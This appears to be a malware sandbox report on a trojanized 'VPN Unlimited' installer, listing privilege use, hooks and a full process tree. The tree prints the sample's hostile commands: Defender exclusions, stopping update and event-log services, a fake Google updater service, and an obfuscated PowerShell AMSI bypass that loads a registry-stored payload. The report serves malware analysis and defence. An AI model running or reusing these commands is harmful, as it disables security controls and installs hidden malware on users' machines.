| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe
"C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\jgt.exe
"C:\Users\Admin\AppData\Local\Temp\jgt.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Local\Temp\Install(4).exe
"C:\Users\Admin\AppData\Local\Temp\Install(4).exe"
C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe
"C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe"
C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp" /SL5="$901BE,103859173,936960,C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
"C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe" -Duser.language=en -Duser.country=US -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QPlaGzHWjLcR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BMXRzteBckOpTX,[Parameter(Position=1)][Type]$JXiAwYLqeX)$ZQmIRIErBvx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+'te'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+'al'+'e'+''+[Char](100)+''+','+'A'+'n'+''+'s'+''+[Char](105)+''+'C'+'l'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$ZQmIRIErBvx.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+'m'+''+[Char](101)+','+[Char](72)+'i'+[Char](100)+''+[Char](101)+'By'+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$BMXRzteBckOpTX).SetImplementationFlags('R'+[Char](117)+'nti'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+'a'+'na'+'g'+'e'+[Char](100)+'');$ZQmIRIErBvx.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+','+'H'+[Char](105)+''+'d'+'e'+'B'+'y'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$JXiAwYLqeX,$BMXRzteBckOpTX).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+'a'+'ge'+[Char](100)+'');Write-Output $ZQmIRIErBvx.CreateType();}$hQGrnCdJuPRRg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+'cros'+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+'3'+[Char](50)+'.'+[Char](85)+''+'n'+'sa'+'f'+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+'ds');$mQNbVLcLjBmxyo=$hQGrnCdJuPRRg.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+'r'+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](83)+'t'+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TNcOBUIdmRFsSTinVUr=QPlaGzHWjLcR @([String])([IntPtr]);$zospZadJqnkWsEueYDLQvo=QPlaGzHWjLcR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MFEtruaBHQH=$hQGrnCdJuPRRg.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'nd'+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+'e'+'l'+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$LEOgUncfrZovMV=$mQNbVLcLjBmxyo.Invoke($Null,@([Object]$MFEtruaBHQH,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$mrUPbrlIgIhHbOhCm=$mQNbVLcLjBmxyo.Invoke($Null,@([Object]$MFEtruaBHQH,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+'l'+''+'P'+'r'+'o'+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$FKbeRAT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEOgUncfrZovMV,$TNcOBUIdmRFsSTinVUr).Invoke('a'+'m'+''+[Char](115)+'i'+[Char](46)+'d'+'l'+''+[Char](108)+'');$zpIZuOuqcTLrGSonr=$mQNbVLcLjBmxyo.Invoke($Null,@([Object]$FKbeRAT,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+'Sc'+[Char](97)+''+'n'+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$RmipKWjnBT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mrUPbrlIgIhHbOhCm,$zospZadJqnkWsEueYDLQvo).Invoke($zpIZuOuqcTLrGSonr,[uint32]8,4,[ref]$RmipKWjnBT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zpIZuOuqcTLrGSonr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mrUPbrlIgIhHbOhCm,$zospZadJqnkWsEueYDLQvo).Invoke($zpIZuOuqcTLrGSonr,[uint32]8,0x20,[ref]$RmipKWjnBT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+''+[Char](87)+'A'+'R'+'E').GetValue(''+'d'+'ial'+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{612eb77d-10c6-4693-ad9d-5e4fea02c350}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
